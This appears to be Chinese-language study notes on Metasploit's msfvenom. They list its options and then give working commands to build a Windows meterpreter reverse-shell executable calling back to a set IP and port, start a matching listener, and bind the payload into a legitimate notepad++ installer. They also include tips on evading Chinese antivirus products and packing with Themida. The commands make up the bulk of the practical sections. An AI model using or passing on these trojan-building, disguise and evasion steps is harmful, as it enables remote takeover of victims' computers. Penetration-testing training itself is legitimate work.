msf Msfvenom

Metasploit之Msfvenom实战渗透 - FreeBuf网络安全行业门户

Metasploit(MSF)渗透测试入门 - 知乎 (zhihu.com)

1、介绍

Msfvenom用于生成木马。

 

-l,--list <type>
# 列出所有可用的项目，其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt, formats等等

-p,--payload <payload>
# 指定特定的 Payload，如果被设置为 - ，那么从标准输入流中读取

--list-options
# 列出--payload <value> 的标准，高级和规避选项

-f,--format <format>
# 指定 Payload 的输出格式(使用 --list formats 列出)

-e,--encoder <encoder>
# 指定使用的 Encoder (使用 --list encoders 列出)

--sec-name <value>
# 生成大型Windows二进制文件时使用的新名称。默认值：随机4个字符的字符串

--smallest
# 使用所有可用的编码器生成最小的payload

--encrypt <value>
# 应用于shellcode的加密或编码类型 (使用--list encrypt 列出)

--encrypt-key <value>
# 用于加密的密钥

--encrypt-iv <value>
# 加密的初始化向量

-a,--arch <arch>
# 指定目标系统架构(使用 --list archs 列出)

--platform <platform>
# 指定目标系统平台 (使用 --list platforms 列出)

-o,--out<path>
# 保存payload文件

-b,--bad-chars <list>
# 设置需要在 Payload 中避免出现的字符，如：'\x00\xff'

-n,--nopsled <length>
# 指定 nop 在 payload 中的数量

-s,--space <length>
# 设置未经编码的 Payload 的最大长度

--encoder-space <length>
# 编码后的 Payload 的最大长度

-i,--iterations <count>
# 设置 Payload 的编码次数

-c,--add-code <path>
# 指定包含一个额外的win32 shellcode文件

-x,--template<path>
# 指定一个特定的可执行文件作为模板

-k,--keep
# 保护模板程序的功能，注入的payload作为一个新的进程运行

-v,--var-name <value>
# 指定一个变量名（当添加 -f 参数的时候，例如 -f python，那么输出为 python 代码， payload 会被按行格式化为 python 代码，追加到一个 python 变量中，这个参数即为指定 python 变量的变量名）

-t,--timeout <second>
# 设置从STDIN读取payload的等待时间（默认为30,0为禁用）

-h,--help
# 帮助

2、使用

msfvenom是用来生成后门的软件，在目标上执行后门，在本地监听上线。

msfvenom在shell里使用，不是msfconsole终端

病毒分为破坏性的和共存性的

2.1 永恒之蓝示例

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -o demo.exe

• -p payload
• 系统/架构/作用/方式
• 本地ip和本地端口，是自主设置的
• -f format
• 作用之后生成文件

一般会被防火墙过滤，需要免杀

2.2 

use exploit/multi/handler
//三个必须的设置，需要与生成的木马一致的设置
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.136
set lport 9999
run

用户双击exe运行之后，攻击者就会收到。

3、权限维持和二次

4、免杀

捆绑木马：下载正常程序，然后捆绑，当用户收到软件执行后会触发。

（可以绕过火绒，但无法绕过对文件校验的360.且需要注意国内程序默认一般是32，无法植入64位的木马）

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -x notepadd++.exe -o demo.exe

加壳：本身是保护软件不被反编译，不被抄袭。分为压缩壳、加密壳

通过加壳软件使用，比如themida